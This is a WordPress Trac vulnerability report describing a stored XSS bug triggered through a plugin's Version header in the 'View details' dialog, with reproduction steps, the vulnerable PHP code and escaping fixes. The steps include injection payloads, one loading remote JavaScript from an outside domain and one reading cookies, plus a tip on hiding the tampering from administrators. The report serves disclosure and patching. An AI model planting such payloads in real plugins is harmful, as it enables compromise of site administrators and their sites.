[wp-trac] [WordPress Trac] #53020: Stored XSS via «View details» plugin iFrame
WordPress Trac
noreply at wordpress.org
Mon Apr 12 10:08:27 UTC 2021
#53020: Stored XSS via «View details» plugin iFrame
----------------------------+-----------------------------
Reporter: m0ze | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Security | Version: trunk
Severity: normal | Keywords: needs-patch
Focuses: administration |
----------------------------+-----------------------------
I found a way to use the XSS attack vector through an iFrame with a
detailed description of the plugin (the plugin «View details» iFrame).
=== Possible operation options:
* substitution or modification of the original plugin to hide malicious
code;
* distribution of the modified plugin through third-party resources.
=== Steps To Reproduce:
0. open any existing plugin from the official WordPress repo, e.g. Hello
Dolly.
1. change the version number to +1 (as a minimum) - from `Version: 1.7.2`
to `Version: 1.7.3`.
2. add your payload right after the last digit - `Version: 1.7.3<script
src="https://m0ze.ru/payload.a.js"></script>`
3. check the plugin info via dashboard, «View details» link.
If you use the payload specifically as a `<script src=...></script>`, then
visually, except for one digit in the plugin version, nothing will change.
Other payloads also work (`<script>alert(document.cookie)</script>` etc.),
but they add extra special characters on the right of the plugin version,
which may alert the website administrator.
=== Screenshots:
[[Image(https://i.imgur.com/7pz6UMh.png)]]
[[Image(https://i.imgur.com/E7ejGkJ.png)]]
[[Image(https://i.imgur.com/r2WQmFQ.png)]]
=== Code:
**/wp-admin/includes/plugin-install.php, 881-884:**
{{{#!php
case 'newer_installed':
	/* translators: %s: Plugin version. */
	echo '<a class="button button-primary right disabled">' . sprintf( __( 'Newer Version (%s) Installed' ), $status['version'] ) . '</a>';
	break;
}}}
=== Quick fix:
`strip_tags($status['version'])`
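As an added illustration (not WordPress core code and not the reporter's patch), the sink above beside a rendering that escapes at output with the core `esc_html()` pattern, plus an allow-list check on the `Version` header as defence in depth; the `__()` and `esc_html()` stand-ins are assumed so the file runs under the plain `php` CLI:

```php
<?php
// Added illustration, not WordPress core code. Stand-ins for the core
// helpers __() and esc_html() are assumed so this runs stand-alone.
if ( ! function_exists( '__' ) ) {
	function __( $text ) {        // real __() also translates
		return $text;
	}
}
if ( ! function_exists( 'esc_html' ) ) {
	function esc_html( $text ) {  // real esc_html() also normalises encoding
		return htmlspecialchars( (string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8' );
	}
}

// Vulnerable form: the version string reaches the HTML body unescaped.
function render_newer_installed_unsafe( $version ) {
	/* translators: %s: Plugin version. */
	return '<a class="button button-primary right disabled">'
		. sprintf( __( 'Newer Version (%s) Installed' ), $version ) . '</a>';
}

// Hardened form: escape at the point of output, so any markup carried in
// the Version header is rendered as inert text.
function render_newer_installed_safe( $version ) {
	/* translators: %s: Plugin version. */
	return '<a class="button button-primary right disabled">'
		. sprintf( __( 'Newer Version (%s) Installed' ), esc_html( $version ) ) . '</a>';
}

// Defence in depth (assumed policy, not a core check): a Version header is
// digits and dots with an optional short alphanumeric suffix such as
// 1.7.3 or 2.0-beta1; anything else is rejected before display.
function is_wellformed_version( $version ) {
	return (bool) preg_match( '/^\d+(?:\.\d+)*(?:[-.][A-Za-z0-9]+)*$/', $version );
}

// Constructed samples: a normal header and one carrying inline markup.
$samples = array( '1.7.2', '1.7.3<script>probe()</script>' );
foreach ( $samples as $v ) {
	printf( "version %s wellformed=%s\n", var_export( $v, true ),
		is_wellformed_version( $v ) ? 'yes' : 'no' );
	echo "  unsafe: " . render_newer_installed_unsafe( $v ) . "\n";
	echo "  safe:   " . render_newer_installed_safe( $v ) . "\n";
}
```

Running it shows the unsafe renderer emitting a live `<script>` tag for the second sample while the safe renderer prints it as `&lt;script&gt;` and the allow-list check flags the header as malformed.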
=== Video:
**YouTube short demo:** https://youtu.be/_IRcQ82wovY
=== Impact
Malicious JavaScript code injection and the ability to combine attack
vectors against the targeted system, which can lead to a complete
compromise of the resource.
There is also an unknown number of plugins that display diagnostic
information about the site, including the names and versions of plugins,
where this vulnerability will also be triggered, e.g. Asset CleanUp: Page
Speed Booster, WP Cerber Security, Anti-spam & Malware Scan and many other
plugins.
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53020>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform